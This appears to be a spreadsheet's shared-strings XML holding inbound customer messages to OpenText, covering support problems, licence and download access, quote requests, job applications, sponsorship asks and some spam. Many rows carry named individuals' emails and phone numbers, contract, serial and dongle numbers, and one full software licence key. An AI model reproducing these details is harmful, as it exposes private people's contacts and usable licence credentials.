  <si>
    <t>I am in need of updating Exceed 15, to latest version.  We currently are unable to connect to our RedHat 7.5 server, and I heard an update was required.  How to I obtain the updated version?    Maint Contract Number: 7281     _x000D_
End User Information:    Northrop Grumman - EU0188149</t>
  </si>
  <si>
    <t>I am an Indie Author writing an eBook (.ePUb / .Mobi file formats) that is image heavy. One of my goals is to include dynamic URL web links into images, and I want to make the URL links searchable and able to launch the website upon point and click.  Do you have a service offering for an "individual subscriber"?  Thanks in advance Carl</t>
  </si>
  <si>
    <t>Moving to new RightFax 16.4 server and having issues with users sending PDF faxes.  error of "Problem Converting Fax Body or Cover Sheet"  and 'The Fax has reached maximum number of allowed pages (0). Attachment will not be added to the fax and fax cannot be sent'</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
I am looking for the current version/release for:_x000D_
TS-CORP-Linux_MAINT-UNL-CPU	NON-TAA COMPLIANT TeamSite Templating _x000D_
S-MO-H9A03AAE	OpenDeploy Receiver _x000D_
OD-REC-07/08_MAINT	OpenDeploy Receiver Maintenance_x000D_
S-MO-H9A00AAE	OpenDeploy Server _x000D_
OD-SERVER-07/08_MAINT	OpenDeploy Server Maintenance_x000D_
TS-BUSINESS USER_MAINT-PREM	TeamSite Business User – Maintenance_x000D_
S-MO-H9A44AAE	TeamSite Departmental Edition Content Server Software _x000D_
S-MO-H9A56AAE	TeamSite Departmental Edition Non-Production Server Software_x000D_
TS-DEVSERVER_MAINT	TeamSite Development Server_x000D_
S-MO-H9A49AAE	TeamSite Named User_x000D_
TS-CORP-Linux_MAINT-PREM	TeamSite Server Corporate Edition –Linux – Maintenance _x000D_
TS-TECHNICAL USER_MAINT-PREM	TeamSite Technical User – Maintenance_x000D_
TS-CORP-Linux_MAINT-UNL-CPU	TeamSite Templating Unlimited CPU - Maintenance_x000D_
_x000D_
I’m also hoping you can provide me with the next release and release date.  Lastly, do you have end of life information for this?</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for more information on your service and platform and white label opportunities. </t>
  </si>
  <si>
    <t>Please provide quote for Documentum Content Server training Technical. Planning to upgrade from 7.1 patch 46 to 7.3. Please provide the correct course name with the quote.</t>
  </si>
  <si>
    <t>Looking for version information and OS support for RightFax. We are currently on 8.7 and are undergoing an infrastructure upgrade discovery project to evaluate support of server 2012R2/2016/2019 as well as AD integration for the same versions.</t>
  </si>
  <si>
    <t>I am requesting to see if there is an updated product with one of your newer suites. Previously it was the Hummingbird Connectivity Suite that had the INETD along with the BOOTP server. What product would have a Windows 10 version of this?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
We are a multi-specialty clinic that uses NextGen as our EMR. Our college at large has decided to do away with traditional POTS faxing and transition to VOIP the first part of next year._x000D_
_x000D_
Our current setup with NextGen does will not play well with VOIP. NextGen has recommended your fax services to us, so I am reaching out to get some basic pricing/usage information! </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My name is Robert Glanville. I am building/organizing a Fall 2019 health IT conference in Toronto, Canada._x000D_
_x000D_
The name of the event is Ontario Regional Health IT Conference sponsored by HIMSS Ontario Chapter._x000D_
_x000D_
This will be a full day regional focused health IT conference with keynotes, multiple breakout sessions, over fifty HIT exhibitors, and more._x000D_
_x000D_
The event venue will be The Toronto Congress Center in Toronto, Canada. Event date is Thursday, October 3rd, 2019. _x000D_
_x000D_
We are in the beginning stages now and I would like to email an invitation to your company next month to consider to participate in this upcoming B2B conference next Fall in Toronto._x000D_
_x000D_
At this time I am reaching out to your company to find out who would be the most appropriate person(s) to send an email invitation to._x000D_
_x000D_
We anticipate several hundred Ontario HIT professionals to be in attendance and we want to make sure we get on your company’s event planning radars this December for next Fall._x000D_
_x000D_
Could you please email me back and let me know who would be the most appropriate person or persons to be working with to send 2019 event information to next month ?_x000D_
_x000D_
Thanks in advance for replying back._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Robert Glanville_x000D_
Conference Organizer_x000D_
Regional Health IT Conference_x000D_
mobile (541) 921-7127_x000D_
email    robert@regionalhealthITconference.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Listed as Integrated with CMC FLEX Credit union core processor. Wish to deploy esignatures in our organization.</t>
  </si>
  <si>
    <t>Hello my password isn't working when I try to log into OpenText catalog.  I don't know if it was accidentally changed somehow?  I would like to re-set my password, but I don't know what the current password is.  Can you help me?  Thank you.</t>
  </si>
  <si>
    <t>Setting up initial password. Dialog says my password is "strong", but gives me "An error occurred updating password".</t>
  </si>
  <si>
    <t xml:space="preserve">I require access to the Encase knowledge base. </t>
  </si>
  <si>
    <t>I am researching an ECM for a small publishing group.  Their content is being migrated to the DITA XML standard. They will need local and centralized source control.  By this, I mean that the files and their relational links should be the same locally as centrally.  This way, publishing could occur at these two levels._x000D_
Please contact me to discuss the best approach for my client.</t>
  </si>
  <si>
    <t>I would like to know how to move my support directly to OpenText instead of a 3rd party= "Wave Technology Solutions"</t>
  </si>
  <si>
    <t xml:space="preserve">I tried to setup an account to access the opentext forums, and the form said it was going to be sending me a confirmation email where I had to click a link. After waiting a while, and not getting the email (still haven't gotten one) - I went back to the site and tried using the "reset password" link. That link emailed me immediately, however the reset failed. I'm assuming because I never clicked the link in the "confirmation" message which was never delivered. </t>
  </si>
  <si>
    <t>Reset password and email on main account.</t>
  </si>
  <si>
    <t>Support access and download link to EnCase Forensics tool._x000D_
_x000D_
Thanks :)</t>
  </si>
  <si>
    <t>OpenText Demo</t>
  </si>
  <si>
    <t>I am working to find Vendor Invoice Mgmt. solutions for Buckman North America. I would like information that can help me highlight advantages of using Opentext over other VIM solutions like ESKER and SAPConcur invoice and invoice request. _x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
I have problem with my account on OT website. I tried to find where I could download updates and other stuff from but everywhere I go appears information that I don't have access. I can't even registrate my product (EnCase Forensics v8) - despite the fact that I have confirmed my email._x000D_
_x000D_
Best Regards_x000D_
Andrzej Biernacki</t>
  </si>
  <si>
    <t>Need a LOV for the Tableau Forensic USB 3.0 Bridge</t>
  </si>
  <si>
    <t>Home credit argent</t>
  </si>
  <si>
    <t>trying to sign in, getting web error</t>
  </si>
  <si>
    <t>Hello,_x000D_
Could you please send us the email address of sales? we would like to send you a quote request to purchase opentext edoc solution._x000D_
Thanks in advance._x000D_
Best Regards.</t>
  </si>
  <si>
    <t>The reason for contacting you, is that I am currently writing my Master thesis about the impact of Artificial Intelligence on the M&amp;A Process (Due Diligence) and read that OpenText is using Artifcial Intelligence. Therefore, I would really appreciate, if I could talk to someone in your company quickly about where you are using it and which input AI gives. Thank you very much in advance. Kind regards, Alex</t>
  </si>
  <si>
    <t>We have some easylink fax numbers for you and may need them to be re-configured but as we have had them a long time we don't have all the information but do have the Easylink NGN numbers -  can you help please</t>
  </si>
  <si>
    <t>Wir installieren beim Kunden eine aktuelle Oracle-DB und die Version 7.1 unterstützt laut der aktuellen Matrix leider nur veraltete Versionen. Gibt es in Kürze ein Update der Matrix in Bezug auf die Unterstützung aktueller Oracle-DBs?</t>
  </si>
  <si>
    <t>Hi_x000D_
I am looking for an european office where i can but Open TXT Enterprise Scan aplication._x000D_
Please advice._x000D_
_x000D_
Jacek Kowal</t>
  </si>
  <si>
    <t>We're interested in your list management service</t>
  </si>
  <si>
    <t>THAN</t>
  </si>
  <si>
    <t>I am looking for encase solution representative in UAE. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested to  OpenText Users?_x000D_
_x000D_
We have 6411 buy leads of OpenText Technology Customers Records from USA._x000D_
_x000D_
We can provide Test file without any obligations. let me know your interest on the same_x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>Vi är användare av First class sedan länge. Nu letar vi ett CRM program. _x000D_
Vad kostar er lösning?_x000D_
_x000D_
Är den integrerad i First class med calender osv?</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently doing some research for a Gartner for technical professionals paper that will help clients understand the correct type of technology to use to automate a business process (e.g., when does RPA, BPM, Low code, etc. work best). I was wondering if you can provide me with a briefing in November some time to cover the various products you have that can be used for process automation, and how you see them fitting together?_x000D_
_x000D_
Cheers,_x000D_
_x000D_
Matt_x000D_
</t>
  </si>
  <si>
    <t>Dear Buyer,_x000D_
I am Floriana Vitale, from Benvolio 1938._x000D_
Benvolio 1938 is the Italian leader in the production of seeds oil with a turnover of 40 million € in 2017 and with the Benvolio brand, our company is among the best performing players in the Italian market._x000D_
We are not only suppliers of the totality of the Italian retailers with our brand and with private label products, but we also produce oil for the most important brands in Europe as Bertolli, Carapelli, Sacla and many more._x000D_
Benvolio is already supplier of most of Italian retailers like Carrefour, Coop, Auchan, Agorà, etc.._x000D_
Thanks to company and products certifications and thanks to the careful selection of 100% Italian raw materials Benvolio could offer to the consumer a premium quality product, innovative, with a high service content and especially in line with the new market trends._x000D_
_x000D_
I would like to better explain my products, my company and send you a company profile. _x000D_
_x000D_
If you would like to receive some products to taste those, I would be glad to send you samples. _x000D_
_x000D_
 Awaiting your kind reply,_x000D_
_x000D_
 _x000D_
_x000D_
Kind regards_x000D_
_x000D_
 _x000D_
FLORIANA VITALE _x000D_
Benvolio 1938 S.r.l</t>
  </si>
  <si>
    <t>We use EnCase Forensic and need access to the download page from the newest version of EnCase Forensic._x000D_
Also I don't find the EnCase Forum any more._x000D_
For example, here is one license number we use: G2002063585_x000D_
Please send us the links._x000D_
Thanks!</t>
  </si>
  <si>
    <t>Enquiry on the capability of InfoArchive with AWS S3</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a redaction technology that can be integrated into one of our SasS products </t>
  </si>
  <si>
    <t>We would like a quote for an electronic fax solution.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Did you investigate on this issue ?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Butuh dana</t>
  </si>
  <si>
    <t>Hi I have troubles to confirm my account with registration confirmation email. There seems to be a loop. May be there is a problem with my old account with product livelink and new account for documentum. I would appreciate it if you could fix my account patrik.aepli@hubersuhner.com and grant access to our products livelink and documentum._x000D_
Best Regards_x000D_
_x000D_
Patrik</t>
  </si>
  <si>
    <t>Would you please to send me the quotation of Report Builder and how can I buy from you.</t>
  </si>
  <si>
    <t>Hello my name Michael AbouJaoude. I am a part of a new function at Advocate called Support Operations that is taking over management responsibilities from our hospital sites. I am an analyst within this team._x000D_
_x000D_
We are currently working on gathering data about the various applications being used within the Advocate network. We want to use this data to better understand how we are using these applications and assess if there is room to consolidate across our sites._x000D_
_x000D_
We are using the “RightFax” application and I was wondering if you had some time to chat with me?  I’m just looking to gather some technical details and documentation(if available) for ongoing support._x000D_
 _x000D_
_x000D_
If there is another person I should contact or an account rep that I should speak to, would you be able to send me their information or send this request their way?_x000D_
_x000D_
 _x000D_
Thanks in advance,_x000D_
Michael AbouJaoude</t>
  </si>
  <si>
    <t>Open Text with  ticket #1-3448688582</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot download the software that was purchased for me.  I created a count and every time I and click the link sent to me in the email, "If the product you ordered is not shipped as physical media (CD or DVD), please download the software from My Support_x000D_
xxx downloads.", it tells me my account doesn't have access for that and tells me to request a confirmation email.  I've received 3 confirmation emails that I click on and then I receive the same error again and again.  How can I access my purchased software, System ID 40988-12661 SERIAL NUMBER# 1000025394_x000D_
</t>
  </si>
  <si>
    <t>DCTM 16.4 Admin fundamentals 5 days onsite Hawaii Jan 2019, how many students</t>
  </si>
  <si>
    <t>Does Captiva support Ricoh MFPs?  Cost vs AutoStore which is currently in place, but I'm trained on InputAccel....</t>
  </si>
  <si>
    <t xml:space="preserve">Wanted to look into Open Text (Hummingbird?) for possible Legal in-house matter/document management solution. </t>
  </si>
  <si>
    <t>Not receiving faxes through the fax in box from a facility. Please verify the following easylink number is working properly 844-233-8035 and 844-233-7009</t>
  </si>
  <si>
    <t>Additional information on your Document Management system and in particular the functionality available to manage drawings, markup, routing, versioning and any additional features.</t>
  </si>
  <si>
    <t>May I please get contact information on where I can request a Verification of Employment for a previous OpenText employee?  Thank you!</t>
  </si>
  <si>
    <t>EDI connection</t>
  </si>
  <si>
    <t>Hi,_x000D_
What certification exam is now offered for Documentum? Specifically, instead of former ECD E10-110 foundation exam for Documentum._x000D_
How can we apply for exam and how it is offered in Serbia? Kindly send the prices._x000D_
Thanks in advance for your help._x000D_
_x000D_
Kind regards,_x000D_
Miljana</t>
  </si>
  <si>
    <t>Hi There, I am working as a team lead in Document Services Team within TNT Express, UK and we are using Opentext TCP system in our production environment. We actively working on enhancement of existing TCP project and need access to OpenText KnowledgeBase (support). Last Year I was OK to login and can access all the information without any issues but now when I am trying I am keep getting error - "Please verify your email, a confirmation email has been sent". However even after confirming my email address 10-15 times it still not letting me do anything._x000D_
_x000D_
Please can you check and resolve the issue as soon as possible._x000D_
Thanks_x000D_
Anil</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There, I am working as a team lead in Document Services Team within TNT Express, UK and we are using Opentext TCP system in our production environment. We actively working on enhancement of existing TCP project and need access to OpenText KnowledgeBase (support). Last year I was OK to login and can access all the information without any issues but now when I am trying </t>
  </si>
  <si>
    <t>Requesting the Media Kit for Enterprise World, Vienna 2019. Need info on booth options/prices, speaking opportunities, sponsorship opportunities, etc._x000D_
Thanks.</t>
  </si>
  <si>
    <t>Looking to purchase software for Document Imaging Service Bureau.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, aktuell bin ich für einen internationalen Konzern bei einem SAP-Einführungs Projekt tätig. Dabei geht es um einen japanischen Konzern mit weltweiten Niederlassungen. Die SAP Einführung betrifft Europa mit dem Headquater in Deutschland. Nun kommen wir dabei auf das Thema Dokumentenmanagement zu sprechen. _x000D_
Da ich bereits sehr lange im SAP GEschäft bin, kannte ich vorher IXOS und hatte im meinem ltz. Projekt (in UK) ebenfalls Kontakt mit OPEN TEXT. Daher wende ich mich an Sie._x000D_
In diesem Projekt steht lediglich die Archivierung von Dokumenten unter folgenden Rahmenbedingungen zur Diskussion._x000D_
- System steht in Japan_x000D_
  daher ist ein Support in Japan erforderlich_x000D_
- es geht um ca. 600 User weltweit_x000D_
  hier ist die Frage nach den Lizenzkosten_x000D_
- SAP- und Dt. Finanz-Zertifizierung _x000D_
- Einbindung von G-Mail_x000D_
- hauptsächlich SAP-Ausgangsbelege zu archivieren_x000D_
- ggf. Dokumente wie Verträge / Vereinbarungen (PDF)_x000D_
  und Office-Dokumente _x000D_
- keine Scenarien wie "frühes erfassen" oder andere Workflow_x000D_
  Einsätze_x000D_
_x000D_
Könnten Sie mir dazu Auskünfte und Unterlagen/Information in englisch zur Verfügung stellen ?_x000D_
_x000D_
Besten Dank im Voraus für Ihre Bemühungen._x000D_
Mit freundlichen Grüßen_x000D_
Hans Engelke</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking at OpenText for Digital Asset Management and would like  a demo. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Sir,_x000D_
I am CTO of system integrator in Italy, for my client I am looking for an Forensic Extracted and Advanced Tools and on line investigation tool, I am not sure, but viewing your site and seem that you can hel me._x000D_
1-Forensic Extracted &amp; Advanced Tools_x000D_
Conducting forensic by case study Enhanced Encase Indexing Engine –_x000D_
Image Support –_x000D_
Acquire from Almost Anywhere – _x000D_
Forensically Sound Acquisition Advanced Analysis –_x000D_
Automated de-NISTing Capabilities – _x000D_
Multiple File Viewer Support Integration to Passware Kit Forensic –_x000D_
Atomatic Reports – _x000D_
Actionable Data Acquire data from disk or RAM, documents, images, e-mail, _x000D_
webmail, Internct artifacts, Web history and cache, HTML page reconstruction, _x000D_
chat sessions, compressed files. backup files. encrypted files, RAIDs workstations, _x000D_
servers, and with Version 7: smartphones and tablets_x000D_
_x000D_
2 online Investigation Tool_x000D_
_x000D_
The ability to perform link analysis on up to 10 000 entities on single graph. _x000D_
The capability to return up to 12 entities per transform that is run. Includes _x000D_
collection nodes which automatically group entities together with common _x000D_
features allowing you to see passed the noise and find the key relationships _x000D_
you are looking for. Includes the ability to share graphs in real-time with multiple _x000D_
analysts in a - - - single session - Graph export options include: - GraphML - Entity lists. – _x000D_
Graph import options include: _x000D_
- Tablular fornals esv, xlx and xisx. - Copy and paste. _x000D_
TECHNICALS DEATILS - Uses Java, so it runs on Windows, Mac and Linux. Hardware Requirements: _x000D_
-client requires at least 2GB of RAM -Ay nodern multi-core processor will have more than cnough processing power 4GB of disk space_x000D_
_x000D_
3 Social Media Manageemnt &amp; Analytics Software_x000D_
_x000D_
Software include: 3 year license The platform can usc to: - search to quickly make sense of social data and draw insights – _x000D_
Visual analytics to help you uncover new insights by behaviors and interests  _x000D_
Proactive social monitoring that </t>
  </si>
  <si>
    <t>bonjour_x000D_
Je suis la gérante de la société Ribambelle. Nous avons organisé pour vous votre "Arbre de noël" 2017. Mon interlocutrice était Mme Annabel Ribardière. Cette année on me dit qu'elle n'est pas sur la liste de la société. qui dois-je contacter pour l'organisation de votre fête de fin d'année? Je vous remercie de me contacter au :_x000D_
contact.ribambelle95@gmail.com ou 06 34 07 24 81</t>
  </si>
  <si>
    <t>I am a third year Bachelor of Business in Marketing student in Cork Institute of Technology. I am writing to you seeking Marketing work placement in January 2019._x000D_
My work placement  must consist of a minimum of thirty-five hours a week for a minimum of fifteen weeks from January 2019 to May 2019, these are the minimum requirements I as a student must meet. However, I as an enthusiastic upcoming marketeer and business woman am willing to work before and/or after these dates if the opportunity arose._x000D_
_x000D_
I believe my knowledge from studying areas such as Digital Advertising, Competitor analysis, Social media marketing, Advertising and Promotion and many more enable me to help enhance your marketing efforts in areas such as creating content, marketing campaigns and event promotion and website design._x000D_
_x000D_
I am innovative ,enthusiastic, energetic and eager to learn as I believe that this part of my course will award me more knowledge than in class learning does._x000D_
_x000D_
Curriculum Vitae available upon request_x000D_
_x000D_
Kind Regards_x000D_
_x000D_
Clionadh Fahy</t>
  </si>
  <si>
    <t>Schedule meeting to discuss upgrade options and pricing for current rightfax environment.</t>
  </si>
  <si>
    <t>Kundeninteresse</t>
  </si>
  <si>
    <t>Hello-_x000D_
The WI Dept of Corrections recently purchased two EnCase Forensic software licenses.  I am trying to download EnCase.  It looks like the licenses were assigned to the person who completes our purchasing, not the actual end users.  I tried calling the support line this AM and they took my information down but I wanted to continue to reach out to get this resolved.  We have a rather urgent matter to use this software._x000D_
Thanks_x000D_
Lois Barker</t>
  </si>
  <si>
    <t xml:space="preserve">Request meeting to socialized our request,_x000D_
_x000D_
Preference of language to call SPANISH_x000D_
Thank You_x000D_
</t>
  </si>
  <si>
    <t>Dear, it seems that our suppliers meet problem with the sending of the ASN. Please, do you have information about this? Thanks.</t>
  </si>
  <si>
    <t>Researching document management solutions for the legal industry.  We are interested in learning more about OpenText Document Management - is a demo available?</t>
  </si>
  <si>
    <t>I have sent an email to our former contact person in Guidance, Alison Ford, without any reply._x000D_
_x000D_
1: We have 2 licenses with hasp dongels that needs to be renewed, both of them were priviously registered to Lensmannen i Stjordal._x000D_
 _x000D_
If possible we would like to have both of those licenses to have the same SMS expiry date as most of our other dongles (22.9.2020 – SC2005449)_x000D_
 _x000D_
We will also like to change the hasp dongles to the new codemeter dongles for both this licenses._x000D_
 _x000D_
The licenses in question have the following dongle numbers_x000D_
 _x000D_
V1112511915 ( Only V6 dongle)_x000D_
V222372728 (Expired this year)_x000D_
 _x000D_
2:  We also has another dongle V598147750 registered at contract SC 2005449 that we would like to change to a codemeter dongle._x000D_
 _x000D_
 _x000D_
Can you please give us a quote for this</t>
  </si>
  <si>
    <t xml:space="preserve">Again I can't access guidance KB, support etc_x000D_
please do something _x000D_
It is all the same each time_x000D_
also I can not register product and download new version _x000D_
</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I tried to register to the job Senior SAP Consultant, reference 18628, but I got a time-out in the middle of the application. When I try to sign in with my email address mebertrand@protonmail.com, it doesn't work. Could you send a link to finish the application to this job._x000D_
Thanks._x000D_
Regards,_x000D_
Marc Bertrand</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I just saw in our environmental (Actuate iServer System version: 	11 Service Pack 3 (Build 110E111028)) that our license does not have an expiration date._x000D_
Can that be right?_x000D_
_x000D_
And I have seen that there are some patches and Service Packs available. Is it problematic to install them? What may I think of and what should be expected?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Michael</t>
  </si>
  <si>
    <t>May I know if you have already received my application for the position Procurement Operations Specialist? Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">1- i need to know to give "read" or "read and write" to the users who accessing the alcamy system_x000D_
2- if we can upload all the files from shared folder to be imported in the system </t>
  </si>
  <si>
    <t xml:space="preserve"> want your products please conatct me on my number as sonn as possible </t>
  </si>
  <si>
    <t>CD</t>
  </si>
  <si>
    <t>zzzzz內容zzzzz</t>
  </si>
  <si>
    <t>Check on customers</t>
  </si>
  <si>
    <t>Would like to know all the feature of Teleform. We are currently running version 10.9 but do not have an ongoing support or maintenance.</t>
  </si>
  <si>
    <t xml:space="preserve">How do I migrate Centura TD 1.5 files to OpenText Gupta Team Developer 7.1? What is the price of OpenText Gupta Team Developer 7.1 for university? </t>
  </si>
  <si>
    <t>Looking for Forensics Tool_x000D_
_x000D_
Hi Dear EnCase Team:_x000D_
We are currently looking for a forensics tool that could help us analyze and investigate images from memory and disk acquisition for OS'es like Windows 10 and above, and Mac_x000D_
_x000D_
Is this something that EnCase could cover?_x000D_
_x000D_
We need 3 user licenses for our forensicators._x000D_
_x000D_
Thank you so much for your kind reply._x000D_
-Mike</t>
  </si>
  <si>
    <t>Need access for developer tools/documentation and resources for implementing appxender 8.1 Rest Services.</t>
  </si>
  <si>
    <t>HI,_x000D_
I want to buy product of "OpenText Gupta Team Developer" on line, can you provide me more information or link._x000D_
_x000D_
best,_x000D_
Ivy.</t>
  </si>
  <si>
    <t>We are pursuing the purchase of a fax server solution. I became aware of your company by some folks at Tyndal AFB, FL. We may be looking for a similar quote/purchase.</t>
  </si>
  <si>
    <t>currently have right fax need information about upgrading our current system</t>
  </si>
  <si>
    <t>Evaluación de plataforma</t>
  </si>
  <si>
    <t>Interested in learning more about 'OpenText RightFax Managed Services' and determining if we can make the leap.  Would like a technical review of our current environment when determining if 'OpenText RightFax Managed Services' is a viable solution.</t>
  </si>
  <si>
    <t>deseo información acerca del costo de su plataforma y los requisitos de contratación._x000D_
para una plantilla de personal menor a 50</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon OpenText support, I am reaching out for unattended installs and uninstalls for the vista plus admin console 6.0.0. Any information you can provide on this subject would be great, thank you! </t>
  </si>
  <si>
    <t>I would like to get certified from Encase and refer encase to our health care customers in west coast!! I would also like to invite lunch and learn session with our customer</t>
  </si>
  <si>
    <t>Implementing Enterprise Connect for my company.</t>
  </si>
  <si>
    <t>Need to buy additional bi-query license and support contact.  I am traveling this week. Please email me and I will call you back. _x000D_
_x000D_
Rob</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a solution that will help us manage email and unstructured corporate records.  We plan to evaluate several vendors and select one to pilot with the SWBC Life Insurance Company.  I'm going to be out of the office the rest of the week but please email me.  I want to setup a date/time when we can meet and do a high level review of your solution.  </t>
  </si>
  <si>
    <t>Have registered on your site yet when I try to download Encase Forensic Imager (a free download) and I click on the download link I get a message that says I do not have access to the server.  According to the emails I received from you I am registered both on the site and in My Support.  How do I get  Encase Imager - have been using Encase for ~3.5 years.</t>
  </si>
  <si>
    <t>Mais informações e possibilidade de apresentação do produto para Digital Asset Management.</t>
  </si>
  <si>
    <t>I have contacted once and assume that you all were closed over the weekend, but I was requesting access to mysupport and requesting access to it. We have a RightFax server with ID 09509-12204.</t>
  </si>
  <si>
    <t>I am looking to ask a few questions about how eDocs works and the possibility of getting a trial to assess potential product integration.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Je m'appelle, Mariam Traoré, j'ai 13 ans. Je suis en classe de 3ème dans le collège Bienheureux Charles de Foucault, à Puteaux, je cherche un stage de découverte, du Lundi 17 Décembre au Vendredi 21 Décembre , que j'aimerai faire dans un des services de votre entreprise._x000D_
J'aimerai faire mon stage en informatique, parce que j'en ai toujours été passionné. J'espère que vous me recontacterez rapidement pour échanger plus d'informations._x000D_
(Notamment pour remplir et signée ma convention de stage avant le 9 novembre, si suite.)_x000D_
_x000D_
                                        Merci, avec mes plus sincères salutations._x000D_
</t>
  </si>
  <si>
    <t>I need to submit support ticket for xPression systems on behalf of Conduent for the application I am supporting. There are few issues (text file attached with logs) which are encountered with xPression system and need assistance from OpenText to identify the resolution, direction further._x000D_
I have created my ID at OpenText with email abhishek.sahni@conduent.com, still I am not able to view support options to request a ticket. Please let me know exact steps to follow Or provide me required permissions if not already assigned.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I need to have access to MySupport to be able to download some material._x000D_
I need to urgently proceed with Archive server components_x000D_
_x000D_
Thanks in advance for your help_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Prezados, temos a licença do Teleform v10.5, e gostaríamos de realizar o upgrade da versão. Precisamos atualizar pois todas nossas estações de trabalho estão com windows 10 e o produto que temos não é suportado pelo mesmo.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, _x000D_
The Combat Wounded Coalition (CWC) is a nationally known nonprofit organization based out of Hampton Roads, Virginia that inspires wounded warriors, their families and families of the fallen to overcome. Our vision is that every wounded warrior realizes their full potential and finds pride in their sacrifice, power through events, purpose through connections and peace through ongoing support. _x000D_
 _x000D_
CWC is hosting its 9th annual Toast to the Heroes formal gala. The event will be held at the Renaissance Portsmouth Waterfront Hotel at 425 Water Street, Portsmouth, VA 23704 on March 9, 2019. The evening will include dinner, dancing, entertainment, special guests, themed drinks and, most importantly, the recognition of our combat-wounded warriors’ sacrifices and a night of true camaraderie. A silent auction will be held in conjunction with the event, as a means of fundraising for continuing CWC’s mission. Please consider becoming a sponsor for our warriors and fallen warrior family members. We are also accepting donations of items and services for our silent auction. Your support would be greatly appreciated.  _x000D_
_x000D_
_x000D_
_x000D_
All the best,_x000D_
_x000D_
Danni Herring_x000D_
_x000D_
Combat Wounded Coalition_x000D_
_x000D_
Sponsorship and Development_x000D_
_x000D_
757-390-3369_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>contract renewal - account number 779350</t>
  </si>
  <si>
    <t>my Fax2Mail number is not working.</t>
  </si>
  <si>
    <t>FBD are currently conducting a RFI for a new Enterprise Document/Records Management System.  Could you please send me details of the appropriate contact to send the RFI document  to including an email address._x000D_
_x000D_
Regards_x000D_
Dave Murray</t>
  </si>
  <si>
    <t>Trying to reach learning services</t>
  </si>
  <si>
    <t>I need to move one SQL Windows 4.2 with PMC = 8C3D7440-79A69228-B16C399E-08460BEE from a deprecated PC to my current PC._x000D_
_x000D_
Thank you,_x000D_
Juan Lastra</t>
  </si>
  <si>
    <t>Hi, I represent the Registry of Motor Vehicles. We have a number of clients who use GXS. Please be advised that we are moving away from GXS. Please contact me for futher discussion. Thanks, Jonathan</t>
  </si>
  <si>
    <t>looking at the security features and data protection aspect of email filer solution.</t>
  </si>
  <si>
    <t>Hi,_x000D_
We want to buy add licence for OpenText Content Server. Could you please direct us to take an offer._x000D_
_x000D_
Best Regards,_x000D_
Rabia Özalp</t>
  </si>
  <si>
    <t>I need Vista Plus 5.2 download link and License Key to support my end users.</t>
  </si>
  <si>
    <t>Hello - I'd like to speak with someone about setting up an account and using OpenText's software as we'd like to transition to EDI orders. We are a 3rd party distributor who submits orders into manufactures on behalf of our distributors. _x000D_
_x000D_
Looking forward to speaking with someone. _x000D_
_x000D_
Cheers, _x000D_
_x000D_
Nicholas Grammater</t>
  </si>
  <si>
    <t>I need to register 3 employees for multiple course for Nov/Dec. Please have someone contact me for registration, email is fine for contacting me too. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
_x000D_
My name is Albert Soler and I work in the Forensic Technology department in KPMG Madrid. _x000D_
_x000D_
We would like to request a demo of your products as we are advising law firms in new technologies. We would appreciate any additional information about them that you could facilitate us. _x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
I look forward to hearing from you soon._x000D_
_x000D_
Sincerely,_x000D_
Albert Soler_x000D_
</t>
  </si>
  <si>
    <t>request access to Open Text connect</t>
  </si>
  <si>
    <t>i need your support in two issues_x000D_
1- how to edit in the "role settings"  _x000D_
2- i want to ask if this software can take the scanned document automatically from share folder and saved them in her database.</t>
  </si>
  <si>
    <t>Önskar få rätt mejladress till Lotta Calmerfalk tack._x000D_
/Niklas</t>
  </si>
  <si>
    <t xml:space="preserve">I'm interesting on Exstream software </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello, _x000D_
_x000D_
I checked this article benzinga com pressreleases 18 10 r 12605515 opentext to acquire liaison technologies inc_x000D_
_x000D_
_x000D_
_x000D_
And want to know if you are looking for some more guest posts like this? You can also forward this mail to your current SEO company, we will work together for best results for your website._x000D_
_x000D_
I'm a guest blogger and I can help you to get more guest posts on the relevant website._x000D_
_x000D_
_x000D_
Waiting for your comment_x000D_
_x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
Ich möchte gern für meinen Kollegen, Rene Kullick die Schulung Titel: 3-8010 Documentum Technical Fundementals v16.4 vom 03. - 07.12.2018 in München buchen. Wir benötigen eine Bestätigung, um daraus eine Bestellung zu generieren auf die dann die Rechnung von Ihnen referiert werden kann. _x000D_
_x000D_
Bitte senden Sie die Bestätigung an meine E-Mail-Adresse sowie auch Hotelempfehlungen._x000D_
_x000D_
Herzlichen Dank und beste Grüße_x000D_
Claudia Ferchow</t>
  </si>
  <si>
